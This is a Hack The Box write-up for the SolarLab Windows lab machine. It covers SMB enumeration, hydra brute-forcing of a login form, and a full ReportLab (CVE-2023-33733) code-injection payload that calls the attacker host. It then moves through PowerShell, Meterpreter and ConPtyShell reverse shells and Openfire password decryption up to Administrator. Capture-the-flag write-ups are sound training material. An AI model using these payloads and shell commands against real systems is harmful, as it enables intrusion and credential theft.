Hack The Box / WINDOWS / 2024-05-18
Hack The Box - SolarLab (Windows)
Anonymous SMB document leak exposes credentials, ReportLab PDF injection gives code execution, then credential pivoting through app/Openfire data leads to Administrator shell.
Target
- IP: 10.129.179.69
Recon
sudo nmap -sC -sV 10.129.179.69 -p- -v
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-14T19:30:04
|_ start_date: N/A
Add to /etc/hosts:
10.129.179.69 solarlab.htb report.solarlab.htb
SMB Enumeration
smbclient -N -L //10.129.179.69/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Mount the Documents share (anonymous access: any username with an empty password works):
mkdir mount
sudo mount -t cifs //10.129.179.69/Documents ./mount -o username=hello,password=
tree
.
├── concepts
│ ├── Training-Request-Form.docx
│ └── Travel-Request-Sample.docx
├── desktop.ini
├── details-file.xlsx
├── My Music
├── My Pictures
├── My Videos
└── old_leave_request_form.docx
details-file.xlsx is a sheet titled "Password File". Stripped of the spreadsheet's empty columns, it contains:

Alexander's SSN  123-23-5424
Claudia's SSN    820-378-3984
Blake's SSN      739-1846-436

Site       | Account#     | Username                   | Password               | Security Question                    | Answer            | Email                      | Other information
Amazon.com | 101-333      | Alexander.knight@gmail.com | al;ksdhfewoiuh         | What was your mother's maiden name?  | Blue              | Alexander.knight@gmail.com |
Pefcu      | A233J        | KAlexander                 | dkjafblkjadsfgl        | What was your high school mascot     | Pine Tree         | Alexander.knight@gmail.com |
Chase      |              | Alexander.knight@gmail.com | d398sadsknr390         | What was the name of your first pet? | corvette          | Claudia.springer@gmail.com |
Fidelity   |              | blake.byte                 | ThisCanB3typedeasily1@ | What was your mother's maiden name?  | Helena            | blake@purdue.edu           |
Signa      |              | AlexanderK                 | danenacia9234n         | What was your mother's maiden name?  | Poppyseed muffins | Alexander.knight@gmail.com | account number: 1925-47218-30
           |              | ClaudiaS                   | dadsfawe9dafkn         | What was your mother's maiden name?  | yellow crayon     | Claudia.springer@gmail.com | account number: 3872-03498-45
Comcast    | JHG3434      |                            |                        |                                      |                   |                            |
Vectren    | YUIO576      |                            |                        |                                      |                   |                            |
Verizon    | 1111-5555-33 |                            |                        |                                      |                   |                            |
Save users in users.txt and passwords in passwords.txt.
Web Login Brute Force
Browse http://report.solarlab.htb:6791/ (login form).
Testing the discovered credentials against the form reveals AlexanderK and ClaudiaS as valid usernames (the form reports unknown users as not found, which is why the hydra failure condition below matches both failure messages).
The valid usernames follow a first-name-plus-last-initial pattern, so add BlakeB (for blake.byte) to users.txt, then run:
hydra -L users.txt -P passwords.txt report.solarlab.htb http-post-form -s 6791 "/login:username=^USER^&password=^PASS^:F=error|not found"
[6791][http-post-form] host: report.solarlab.htb login: BlakeB password: ThisCanB3typedeasily1@
Log in with discovered credentials.
Initial Access via ReportLab Injection
A PDF is generated from form input. PDF properties show:
Producer: ReportLab PDF Library - www.reportlab.com
Exploit reference:
https://github.com/c53elyas/CVE-2023-33733
Start HTTP server:
python3 -m http.server 80
Create a PDF request, intercept with Burp, and set leave_request to:
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl http://10.10.16.13') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
Submit request.
We get a callback on our HTTP server.
Generate a PowerShell #3 (Base64) reverse shell on revshells.com (attacker IP 10.10.16.13, port 4444) and replace the curl command in the payload with:
system('powershell -e <base64-encoded reverse shell>')
Start listener:
nc -vlnp 4444
Send request.
Result:
Reverse shell as solarlab\blake.
Pivot to openfire User
Generate Meterpreter payload:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o reverse.exe
Upload reverse.exe to the victim, start exploit/multi/handler in msfconsole with the matching payload (windows/x64/meterpreter_reverse_tcp, LPORT 4444), and execute reverse.exe.
We get a Meterpreter session.
Download the application's SQLite database (passwords are stored in plaintext):
cd C:\Users\blake\Documents\app\instance
download users.db
sqlite3 users.db
select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
The alexanderk password from the app database is reused by the local openfire service account. Upload RunasCs and verify:
https://github.com/antonioCoco/RunasCs
.\RunasCs.exe 'openfire' 'HotP!fireguard' "whoami"
solarlab\openfire
Copy ConPtyShell to C:\Users\Public\Downloads and grant openfire full control so the process RunasCs launches can read and execute it:
icacls "C:\Users\Public\Downloads\ConPtyShell.exe" /grant openfire:F
Start attacker listener:
stty raw -echo; (stty size; cat) | nc -lvnp 4444
Run shell as openfire:
.\RunasCs.exe 'openfire' 'HotP!fireguard' "C:\Users\Public\Downloads\ConPtyShell.exe 10.10.16.13 4444"
We get a reverse shell as openfire.
Administrator Access via Openfire Secrets
cd C:\Program Files\Openfire\embedded-db
type openfire.script
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)
Openfire stores ENCRYPTEDPASSWORD as Blowfish ciphertext keyed by the passwordKey property. Tool to decrypt it:
https://github.com/shakaw/openfire-password-decrypt.git
sudo apt install php-mcrypt
php -a
Define decrypt_openfirepass, change return $plaintext; to echo $plaintext, then run:
decrypt_openfirepass("becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442", "hGXiFzsKaAeYLjn");
ThisPasswordShouldDo!@
Run as Administrator:
.\RunasCs.exe 'Administrator' 'ThisPasswordShouldDo!@' "whoami"
solarlab\administrator
Start listener:
stty raw -echo; (stty size; cat) | nc -lvnp 4444
Spawn final shell:
.\RunasCs.exe 'Administrator' 'ThisPasswordShouldDo!@' "C:\Users\Public\Downloads\ConPtyShell.exe 10.10.16.13 4444"
We get a reverse shell as Administrator.